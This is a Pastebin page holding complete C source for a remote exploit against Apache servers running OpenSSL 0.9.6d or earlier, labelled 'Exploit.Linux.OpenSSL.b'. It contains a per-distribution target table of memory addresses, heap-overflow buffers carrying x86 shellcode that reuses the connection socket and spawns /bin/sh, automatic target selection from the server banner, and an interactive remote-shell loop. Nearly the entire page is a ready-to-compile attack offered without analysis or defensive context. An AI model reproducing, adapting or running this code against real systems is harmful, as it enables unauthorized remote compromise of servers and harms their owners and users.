FlyFar

Exploit.Linux.OpenSSL.b

Jul 8th, 2023
111
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 15.93 KB | Cybersecurity | 0 0
  1. /*gcc -o t t.c -lcrypto
  2.  *OpenSSL v0.9.6d and below remote exploit
  3.  */
  4. #include <stdio.h>
  5. #include <unistd.h>
  6. #include <string.h>
  7. #include <fcntl.h>
  8. #include <stdlib.h>
  9. #include <stdarg.h>
  10. #include <sys/ioctl.h>
  11. #include <sys/types.h>
  12. #include <sys/socket.h>
  13. #include <netinet/in.h>
  14. #include <sys/time.h>
  15. #include <unistd.h>
  16. #include <errno.h>
  17. #include <netdb.h>
  18. #include <arpa/telnet.h>
  19. #include <sys/wait.h>
  20. #include <signal.h>
  21.  
  22. #include <openssl/ssl.h>
  23. #include <openssl/rsa.h>
  24. #include <openssl/x509.h>
  25. #include <openssl/evp.h>
  26.  
  27. unsigned long myip=0;
  28.  
  29. void conv(char *str,int len,unsigned long server) {
  30.     memset(str,0,len);
  31.     strcpy(str,(char*)inet_ntoa(*(struct in_addr*)&server));
  32. }
  33.  
  34. void cleanup(char *buf) {
  35.     while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0;
  36.     while(*buf == '\n' || *buf == '\r' || *buf == ' ') {
  37.         unsigned long i;
  38.         for (i=strlen(buf)+1;i>0;i--) buf[i-1]=buf[i];
  39.     }
  40. }
  41.  
  42. char *GetAddress(char *ip) {
  43.     struct sockaddr_in sin;
  44.     fd_set fds;
  45.     int n,d,sock;
  46.     char buf[1024];
  47.     struct timeval tv;
  48.     sock = socket(PF_INET, SOCK_STREAM, 0);
  49.     sin.sin_family = PF_INET;
  50.     sin.sin_addr.s_addr = inet_addr(ip);
  51.     sin.sin_port = htons(80);
  52.     if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) return NULL;
  53.     write(sock,"GET / HTTP/1.1\r\n\r\n",strlen("GET / HTTP/1.1\r\n\r\n"));
  54.     tv.tv_sec = 15;
  55.     tv.tv_usec = 0;
  56.     FD_ZERO(&fds);
  57.     FD_SET(sock, &fds);
  58.     memset(buf, 0, sizeof(buf));
  59.     if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
  60.         if(FD_ISSET(sock, &fds)) {
  61.             if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL;
  62.             for (d=0;d<n;d++) if (!strncmp(buf+d,"Server: ",strlen("Server: "))) {
  63.                 char *start=buf+d+strlen("Server: ");
  64.                 for (d=0;d<strlen(start);d++) if (start[d] == '\n') start[d]=0;
  65.                 cleanup(start);
  66.                 return strdup(start);
  67.             }
  68.         }
  69.     }
  70.     return NULL;
  71. }
  72.  
  73. #define ENC(c) ((c) ? ((c) & 077) + ' ': '`')
  74.  
  75. int sendch(int sock,int buf) {
  76.     char a[2];
  77.     int b=1;
  78.     if (buf == '`' || buf == '\\' || buf == '$') {
  79.         a[0]='\\';
  80.         a[1]=0;
  81.         b=write(sock,a,1);
  82.     }
  83.     if (b <= 0) return b;
  84.     a[0]=buf;
  85.     a[1]=0;
  86.     return write(sock,a,1);
  87. }
  88.  
  89. int writem(int sock, char *str) {
  90.     return write(sock,str,strlen(str));
  91. }
  92.  
  93.  
  94. #define MAX_ARCH 21
  95.  
  96. struct archs {
  97.     char *os;
  98.     char *apache;
  99.     int func_addr;
  100. } architectures[] = {
  101.     {"Gentoo", "1.3.24-r2", 0x08086c34},
  102.     {"Debian Woody GNU/Linux 3.0", "1.3.26", 0x080863cc},
  103.     {"Red-Hat 6.0", "1.3.6", 0x080707ec},
  104.     {"Red-Hat 6.1", "1.3.9", 0x0808ccc4},
  105.     {"Red-Hat 6.2", "1.3.12", 0x0808f614},
  106.     {"Red-Hat 7.0", "1.3.12", 0x0809251c},
  107.     {"Red-Hat 7.1", "1.3.19", 0x0809af8c},
  108.     {"Red-Hat 7.2", "1.3.20", 0x080994d4},
  109.     {"Redhat Linux 7.2 (apache-1.3.26 w/PHP)", "1.3.26", 0x08269988},
  110.     {"Red-Hat 7.3", "1.3.26", 0x08161c14},
  111.     {"Red-Hat 7.3", "1.3.23", 0x0808528c},
  112.     {"Red-Hat", "1.3.22", 0x0808400c},
  113.     {"SuSE Linux 7.0", "1.3.12", 0x0809f54c},
  114.     {"SuSE Linux 7.1", "1.3.17", 0x08099984},
  115.     {"SuSE Linux 7.2", "1.3.19", 0x08099ec8},
  116.     {"SuSE Linux 7.3", "1.3.20", 0x08099da8},
  117.     {"SuSE Linux 8.0", "1.3.23", 0x08086168},
  118.     {"SuSE Linux 8.0#", "1.3.23", 0x080861c8},
  119.     {"Mandrake Linux 7.1", "1.3.14", 0x0809d6c4},
  120.     {"Mandrake Linux 8.0", "1.3.19", 0x0809ea98},
  121.     {"Mandrake Linux 8.1", "1.3.20", 0x0809e97c},
  122.     {"Mandrake Linux 8.2", "1.3.23", 0x08086580},
  123.     {"Slackware 7.0", "1.3.26", 0x083d37fc},
  124.     {"Slackware 8.1-stable", "1.3.26",0x080b2100},
  125.     {NULL, NULL,0},
  126. };
  127.  
  128. extern int errno;
  129.  
  130. int cipher;
  131. int ciphers;
  132.  
  133. #define FINDSCKPORTOFS     208 + 12 + 46
  134.  
  135. unsigned char overwrite_session_id_length[] =
  136.     "AAAA"
  137.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  138.     "\x70\x00\x00\x00";
  139.  
  140. unsigned char overwrite_next_chunk[] =
  141.     "AAAA"
  142.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  143.     "AAAA"
  144.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  145.     "AAAA"
  146.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
  147.     "AAAA"
  148.     "\x00\x00\x00\x00"
  149.     "\x00\x00\x00\x00"
  150.     "AAAA"
  151.     "\x01\x00\x00\x00"
  152.     "AAAA"
  153.     "AAAA"
  154.     "AAAA"
  155.     "\x00\x00\x00\x00"
  156.     "AAAA"
  157.     "\x00\x00\x00\x00"
  158.     "\x00\x00\x00\x00\x00\x00\x00\x00"
  159.     "AAAAAAAA"
  160.  
  161.     "\x00\x00\x00\x00"
  162.     "\x11\x00\x00\x00"
  163.     "fdfd"
  164.     "bkbk"
  165.     "\x10\x00\x00\x00"
  166.     "\x10\x00\x00\x00"
  167.  
  168.     "\xeb\x0a\x90\x90"
  169.     "\x90\x90\x90\x90"
  170.     "\x90\x90\x90\x90"
  171.  
  172.     "\x31\xdb"
  173.     "\x89\xe7"
  174.     "\x8d\x77\x10"
  175.     "\x89\x77\x04"
  176.     "\x8d\x4f\x20"
  177.     "\x89\x4f\x08"
  178.     "\xb3\x10"
  179.     "\x89\x19"
  180.     "\x31\xc9"
  181.     "\xb1\xff"
  182.     "\x89\x0f"
  183.     "\x51"
  184.     "\x31\xc0"
  185.     "\xb0\x66"
  186.     "\xb3\x07"
  187.     "\x89\xf9"
  188.     "\xcd\x80"
  189.     "\x59"
  190.     "\x31\xdb"
  191.     "\x39\xd8"
  192.     "\x75\x0a"
  193.     "\x66\xb8\x12\x34"
  194.     "\x66\x39\x46\x02"
  195.     "\x74\x02"
  196.     "\xe2\xe0"
  197.     "\x89\xcb"
  198.     "\x31\xc9"
  199.     "\xb1\x03"
  200.     "\x31\xc0"
  201.     "\xb0\x3f"
  202.     "\x49"
  203.     "\xcd\x80"
  204.     "\x41"
  205.     "\xe2\xf6"
  206.  
  207.     "\x31\xc9"
  208.     "\xf7\xe1"
  209.     "\x51"
  210.     "\x5b"
  211.     "\xb0\xa4"
  212.     "\xcd\x80"
  213.  
  214.     "\x31\xc0"
  215.     "\x50"
  216.     "\x68""//sh"
  217.     "\x68""/bin"
  218.     "\x89\xe3"
  219.     "\x50"
  220.     "\x53"
  221.     "\x89\xe1"
  222.     "\x99"
  223.     "\xb0\x0b"
  224.     "\xcd\x80";
  225.  
  226. #define BUFSIZE 16384
  227. #define CHALLENGE_LENGTH 16
  228. #define RC4_KEY_LENGTH 16
  229. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
  230. #define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))    )),c+=2)
  231. #define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
  232.  
  233. typedef struct {
  234.     int sock;
  235.     unsigned char challenge[CHALLENGE_LENGTH];
  236.     unsigned char master_key[RC4_KEY_LENGTH];
  237.     unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
  238.     int conn_id_length;
  239.     unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
  240.     X509 *x509;
  241.     unsigned char* read_key;
  242.     unsigned char* write_key;
  243.     RC4_KEY* rc4_read_key;
  244.     RC4_KEY* rc4_write_key;
  245.     int read_seq;
  246.     int write_seq;
  247.     int encrypted;
  248. } ssl_conn;
  249.  
  250. long getip(char *hostname) {
  251.     struct hostent *he;
  252.     long ipaddr;
  253.     if ((ipaddr = inet_addr(hostname)) < 0) {
  254.         if ((he = gethostbyname(hostname)) == NULL) exit(-1);
  255.         memcpy(&ipaddr, he->h_addr, he->h_length);
  256.     }  
  257.     return ipaddr;
  258. }
  259.  
  260. int sh(int sock) {
  261.     char localip[256], rcv[1024];
  262.     fd_set rset;
  263.     int maxfd, n;
  264.  
  265.        sleep(2);
  266.        write(sock, "uname -a;id\n", strlen("uname -a;id\n"));
  267.        while (1) {
  268.             fd_set          fds;
  269.             int             n;
  270.             struct timeval  tv;
  271.             char buf[1024];
  272.            
  273.             tv.tv_sec = 5;
  274.             tv.tv_usec = 0;
  275.  
  276.             FD_ZERO(&fds);
  277.             FD_SET(0, &fds);
  278.             FD_SET(sock, &fds);
  279.  
  280.             memset(buf, 0, sizeof(buf));
  281.             if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) {
  282.                 if(FD_ISSET(sock, &fds)) {
  283.                     if((n = read(sock, buf, sizeof(buf) - 1)) <= 0)
  284.                         break;
  285.  
  286.                     write(1, buf, n);
  287.                 }
  288.  
  289.                 if(FD_ISSET(0, &fds)) {
  290.                     if((n = read(0, buf, sizeof(buf) - 1)) < 0)
  291.                         exit(1);
  292.  
  293.                     write(sock, buf, n);
  294.                 }
  295.             }//end select
  296.         }//end while
  297.  
  298. }
  299.  
  300. int get_local_port(int sock) {
  301.     struct sockaddr_in s_in;
  302.     unsigned int namelen = sizeof(s_in);
  303.     if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) exit(1);
  304.     return s_in.sin_port;
  305. }
  306.  
  307. int connect_host(char* host, int port) {
  308.     struct sockaddr_in s_in;
  309.     int sock;
  310.     s_in.sin_family = AF_INET;
  311.     s_in.sin_addr.s_addr = getip(host);
  312.     s_in.sin_port = htons(port);
  313.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) exit(1);
  314.     alarm(10);
  315.     if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) exit(1);
  316.     alarm(0);
  317.     return sock;
  318. }
  319.  
  320. ssl_conn* ssl_connect_host(char* host, int port) {
  321.     ssl_conn* ssl;
  322.     if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) exit(1);
  323.     ssl->encrypted = 0;
  324.     ssl->write_seq = 0;
  325.     ssl->read_seq = 0;
  326.     ssl->sock = connect_host(host, port);
  327.     return ssl;
  328. }
  329.  
  330. char res_buf[30];
  331.  
  332. int read_data(int sock, unsigned char* buf, int len) {
  333.     int l;
  334.     int to_read = len;
  335.     do {
  336.         if ((l = read(sock, buf, to_read)) < 0) exit(1);
  337.         to_read -= len;
  338.     } while (to_read > 0);
  339.     return len;
  340. }
  341.  
  342. int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size) {
  343.     int rec_len, padding;
  344.     read_data(ssl->sock, buf, 2);
  345.     if ((buf[0] & 0x80) == 0) {
  346.         rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
  347.         read_data(ssl->sock, &buf[2], 1);
  348.         padding = (int)buf[2];
  349.     }
  350.     else {
  351.         rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
  352.         padding = 0;
  353.     }
  354.     if ((rec_len <= 0) || (rec_len > buf_size)) exit(1);
  355.     read_data(ssl->sock, buf, rec_len);
  356.     if (ssl->encrypted) {
  357.         if (MD5_DIGEST_LENGTH + padding >= rec_len) {
  358.             if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) return 0;
  359.             else exit(1);
  360.         }
  361.         RC4(ssl->rc4_read_key, rec_len, buf, buf);
  362.         rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
  363.         memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
  364.     }
  365.     if (buf[0] == SSL2_MT_ERROR) {
  366.         if (rec_len != 3) exit(1);
  367.         else return 0;
  368.     }
  369.     return rec_len;
  370. }
  371.  
  372. void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len) {
  373.     unsigned char buf[BUFSIZE];
  374.     unsigned char* p;
  375.     int tot_len;
  376.     MD5_CTX ctx;
  377.     int seq;
  378.     if (ssl->encrypted) tot_len = rec_len + MD5_DIGEST_LENGTH;
  379.     else tot_len = rec_len;
  380.  
  381.     if (2 + tot_len > BUFSIZE) exit(1);
  382.  
  383.     p = buf;
  384.     s2n(tot_len, p);
  385.  
  386.     buf[0] = buf[0] | 0x80;
  387.  
  388.     if (ssl->encrypted) {
  389.         seq = ntohl(ssl->write_seq);
  390.  
  391.         MD5_Init(&ctx);
  392.         MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
  393.         MD5_Update(&ctx, rec, rec_len);
  394.         MD5_Update(&ctx, &seq, 4);
  395.         MD5_Final(p, &ctx);
  396.  
  397.         p+=MD5_DIGEST_LENGTH;
  398.  
  399.         memcpy(p, rec, rec_len);
  400.  
  401.         RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
  402.     }
  403.     else memcpy(p, rec, rec_len);
  404.  
  405.     send(ssl->sock, buf, 2 + tot_len, 0);
  406.  
  407.     ssl->write_seq++;
  408. }
  409.  
  410. void send_client_hello(ssl_conn *ssl) {
  411.     int i;
  412.     unsigned char buf[BUFSIZE] =
  413.         "\x01"
  414.         "\x00\x02"
  415.         "\x00\x18"
  416.         "\x00\x00"
  417.         "\x00\x10"
  418.         "\x07\x00\xc0\x05\x00\x80\x03\x00"
  419.         "\x80\x01\x00\x80\x08\x00\x80\x06"
  420.         "\x00\x40\x04\x00\x80\x02\x00\x80"
  421.         "";
  422.     for (i = 0; i < CHALLENGE_LENGTH; i++) ssl->challenge[i] = (unsigned char) (rand() >> 24);
  423.     memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
  424.     send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
  425. }
  426.  
  427. void get_server_hello(ssl_conn* ssl) {
  428.     unsigned char buf[BUFSIZE];
  429.     unsigned char *p, *end;
  430.     int len;
  431.     int server_version, cert_length, cs_length, conn_id_length;
  432.     int found;
  433.  
  434.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
  435.     if (len < 11) exit(1);
  436.  
  437.     p = buf;
  438.  
  439.     if (*(p++) != SSL2_MT_SERVER_HELLO) exit(1);
  440.     if (*(p++) != 0) exit(1);
  441.     if (*(p++) != 1) exit(1);
  442.     n2s(p, server_version);
  443.     if (server_version != 2) exit(1);
  444.  
  445.     n2s(p, cert_length);
  446.     n2s(p, cs_length);
  447.     n2s(p, conn_id_length);
  448.  
  449.     if (len != 11 + cert_length + cs_length + conn_id_length) exit(1);
  450.     ssl->x509 = NULL;
  451.     ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
  452.     if (ssl->x509 == NULL) exit(1);
  453.     if (cs_length % 3 != 0) exit(1);
  454.  
  455.     found = 0;
  456.     for (end=p+cs_length; p < end; p += 3) if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80)) found = 1;
  457.  
  458.     if (!found) exit(1);
  459.  
  460.     if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) exit(1);
  461.  
  462.     ssl->conn_id_length = conn_id_length;
  463.     memcpy(ssl->conn_id, p, conn_id_length);
  464. }
  465.  
  466. void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
  467.     int encrypted_key_length, key_arg_length, record_length;
  468.     unsigned char* p;
  469.     int i;
  470.     EVP_PKEY *pkey=NULL;
  471.     unsigned char buf[BUFSIZE] =
  472.         "\x02"
  473.         "\x01\x00\x80"
  474.         "\x00\x00"
  475.         "\x00\x40"
  476.         "\x00\x08";
  477.     p = &buf[10];
  478.     for (i = 0; i < RC4_KEY_LENGTH; i++) ssl->master_key[i] = (unsigned char) (rand() >> 24);
  479.     pkey=X509_get_pubkey(ssl->x509);
  480.     if (!pkey) exit(1);
  481.     if (pkey->type != EVP_PKEY_RSA) exit(1);
  482.     encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
  483.     if (encrypted_key_length <= 0) exit(1);
  484.     p += encrypted_key_length;
  485.     if (key_arg_overwrite) {
  486.         for (i = 0; i < 8; i++) *(p++) = (unsigned char) (rand() >> 24);
  487.         memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
  488.         key_arg_length = 8 + key_arg_overwrite_len;
  489.     }
  490.     else key_arg_length = 0;
  491.     p = &buf[6];
  492.     s2n(encrypted_key_length, p);
  493.     s2n(key_arg_length, p);
  494.     record_length = 10 + encrypted_key_length + key_arg_length;
  495.     send_ssl_packet(ssl, buf, record_length);
  496.     ssl->encrypted = 1;
  497. }
  498.  
  499. void generate_key_material(ssl_conn* ssl) {
  500.     unsigned int i;
  501.     MD5_CTX ctx;
  502.     unsigned char *km;
  503.     unsigned char c='0';
  504.     km=ssl->key_material;
  505.     for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
  506.         MD5_Init(&ctx);
  507.         MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
  508.         MD5_Update(&ctx,&c,1);
  509.         c++;
  510.         MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
  511.         MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
  512.         MD5_Final(km,&ctx);
  513.         km+=MD5_DIGEST_LENGTH;
  514.     }
  515. }
  516.  
  517. void generate_session_keys(ssl_conn* ssl) {
  518.     generate_key_material(ssl);
  519.     ssl->read_key = &(ssl->key_material[0]);
  520.     ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  521.     RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
  522.     ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
  523.     ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  524.     RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
  525. }
  526.  
  527. void get_server_verify(ssl_conn* ssl) {
  528.     unsigned char buf[BUFSIZE];
  529.     int len;
  530.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
  531.     if (len != 1 + CHALLENGE_LENGTH) exit(1);
  532.     if (buf[0] != SSL2_MT_SERVER_VERIFY) exit(1);
  533.     if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) exit(1);
  534. }
  535.  
  536. void send_client_finished(ssl_conn* ssl) {
  537.     unsigned char buf[BUFSIZE];
  538.     buf[0] = SSL2_MT_CLIENT_FINISHED;
  539.     memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
  540.     send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
  541. }
  542.  
  543. void get_server_finished(ssl_conn* ssl) {
  544.     unsigned char buf[BUFSIZE];
  545.     int len;
  546.     int i;
  547.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) exit(1);
  548.     if (buf[0] != SSL2_MT_SERVER_FINISHED) exit(1);
  549.     if (len <= 112) exit(1);
  550.     cipher = *(int*)&buf[101];
  551.     ciphers = *(int*)&buf[109];
  552. }
  553.  
  554. void get_server_error(ssl_conn* ssl) {
  555.     unsigned char buf[BUFSIZE];
  556.     int len;
  557.     if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) exit(1);
  558. }
  559.  
  560. void exploit(int os,char *ip,int port) {
  561.     int i;
  562.     int arch=-1;
  563.     int N = 20;
  564.     ssl_conn* ssl1;
  565.     ssl_conn* ssl2;
  566.     char *a;
  567.  
  568.     alarm(3600);
  569.    
  570.     arch  = os ;
  571.     if (os ==-1)
  572.     {
  573.         if ((a=GetAddress(ip)) == NULL) exit(0);
  574.         if (strncmp(a,"Apache",6)) exit(0);
  575.         for (i=0;architectures[i].os!=NULL;i++) {
  576.             if (strstr(a,architectures[i].apache) && strstr(a,architectures[i].os)) {
  577.                 arch=i;
  578.                 break;
  579.             }
  580.         }
  581.         if (arch == -1) arch=10;
  582.     }
  583.    
  584.    
  585.     srand(0x31337);
  586.    
  587.    
  588.     for (i=0; i<N; i++) {
  589.         connect_host(ip, port);
  590.         usleep(100000);
  591.     }
  592.    
  593.  
  594.     ssl1 = ssl_connect_host(ip, port);
  595.     ssl2 = ssl_connect_host(ip, port);
  596.  
  597.     send_client_hello(ssl1);
  598.     get_server_hello(ssl1);
  599.     send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
  600.     generate_session_keys(ssl1);
  601.     get_server_verify(ssl1);
  602.     send_client_finished(ssl1);
  603.     get_server_finished(ssl1);
  604.  
  605.     port = get_local_port(ssl2->sock);
  606.     overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
  607.     overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
  608.  
  609.     *(int*)&overwrite_next_chunk[156] = cipher;
  610.     *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
  611.     *(int*)&overwrite_next_chunk[196] = ciphers + 16;
  612.  
  613.     send_client_hello(ssl2);
  614.     get_server_hello(ssl2);
  615.  
  616.     send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
  617.     generate_session_keys(ssl2);
  618.     get_server_verify(ssl2);
  619.  
  620.     for (i = 0; i < ssl2->conn_id_length; i++) ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
  621.  
  622.     send_client_finished(ssl2);
  623.     get_server_error(ssl2);
  624.  
  625.     sh(ssl2->sock);
  626.  
  627.     close(ssl2->sock);
  628.     close(ssl1->sock);
  629.  
  630.     exit(0);
  631. }
  632.  
  633. int main(int argc, char * argv[])
  634. {
  635.     int port = 443;
  636.     int os,i;
  637.  
  638.     if (argc < 3)
  639.     {
  640.     printf("APACHE + OPENSSL EXPLOIT\n\n");
  641.     for (i=0;architectures[i].os!=NULL;i++)
  642.         printf("target %d  %s %s %p\n",i,architectures[i].os,architectures[i].apache,architectures[i].func_addr);
  643.        
  644.     printf("\n");
  645.     printf("usage:%s target hostip [port]\n",argv[0]);
  646.     printf("usage:%s auto hostip [port] to auto select target\n",argv[0]);
  647.     exit(0);
  648.     }
  649.     if (argc >3 )
  650.     {
  651.         port = atoi(argv[3]);
  652.     }
  653.    
  654.     if (strcmp("auto",argv[1])==0)
  655.         os = -1;
  656.     else os =atoi(argv[1]);
  657.  
  658.     exploit(os,argv[2],port);
  659.     return 0;
  660. }
Tags: Exploit Linux
Add Comment
Please, Sign In to add comment